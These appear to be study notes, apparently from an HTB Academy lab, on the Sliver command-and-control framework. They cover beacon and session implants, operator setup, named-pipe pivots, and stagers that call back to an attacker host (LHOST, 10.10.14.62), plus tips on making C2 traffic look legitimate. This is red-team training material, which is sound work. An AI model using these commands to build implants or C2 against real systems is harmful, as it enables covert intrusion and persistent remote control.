C2 and Implants
A command and control (C2) server is software used to execute binaries and commands on a remote computer or network of computers. The idea is to have a centralized management system where the operator manages access to machines in the network.
A C2 server creates a specific executable (called implant) that establishes communication channel between server and target.
Sliver is a specific C2 software that uses implants (binaries used to preserve an entry onto a target), implant (communication channel from the target host to the C2) and stagers (way of loading a code onto a remote machine). A callback is when an executed implant on the target system is communicating back to the server.
Armory portion of Sliver allows installing/using pre-made .NET binaries. These can often easily be detected by tools.
Implants operator come in two modes: beacon, which operates in intervals, executing a command at a set period, and session, where commands are executed immediately. Beacon is generally safer because the traffic is streamlined at a constant pace.
Listeners allow the implant to connect the C2 server.
Making some modifications to the ~/.sliver/config/http-c2.json like adding legitimate request or response headers and changing filenames and extensions in URL generation will help the C2 be more secure.
Operators and Multiplayer
# To differentiate who can connect based on profile
[server] sliver > new-operator -n name -l HOST
#Allow multiple operators
[server] sliver > multiplayer
# Import sliver client profile to access the server
sliver-client import name.cfgBeacon Implant
# Generate an implant in beacon mode
# -J can set the jitter time of the callback randomly flunctuating time based on value
# -S sets the time interval of the callback
# --skip-symbol skips obfuscating the Go symbols and import paths
# we can _obfuscated to the end of protocol
sliver > generate beacon --http 127.0.0.1 --skip-symbols -N http_beacon --os windowsNamed Pipe Pivot
Named pipes is a concept for creating communicating between a server and a client used by Windows.
The pipe name defines how it is reached:
\\ServerName\pipe\PipeNameaccesses a pipe hosted on another system.\\.\pipe\PipeNameaccesses a pipe on the local system.\\.is shorthand for “this computer”.
A typical workflow looks like: a pivot listener is like a bind shell, we are starting a pivot listener on Host A, and from Host B, we will connect to Host A, establishing a chain of communication between the two hosts. Usually used in environments where traffic routing is restricted.
#Start a named pipe pivot listener at \\.pipe\academy
[server] sliver (http_beacon) > pivots named-pipe --bind academy
#After starting the listener we need to generate the implant
sliver > generate --named-pipe 127.0.0.1/pipe/academy -N pipe_academy --skip-symbolsStagers
To use a stager we first create a profile to define an implant configuration to be reused, then we create a stage-listener, and a stager that uses some sort of payload to implant onto the system.
# profiles are needed to define an implant blueprint configuration to be reused, beaconing to that IP
sliver > profiles new --http 10.10.14.62:8088 --format shellcode htb
# Generates the stage listener that listens on specified port
sliver > stage-listener --url tcp://LHOST:4443 --profile htb
#Start the listener
sliver > http -L LHOST -l 8088
# Generate the stager
sliver > generate stager --lhost LHOST --lport 4443 --format csharp --save staged.txt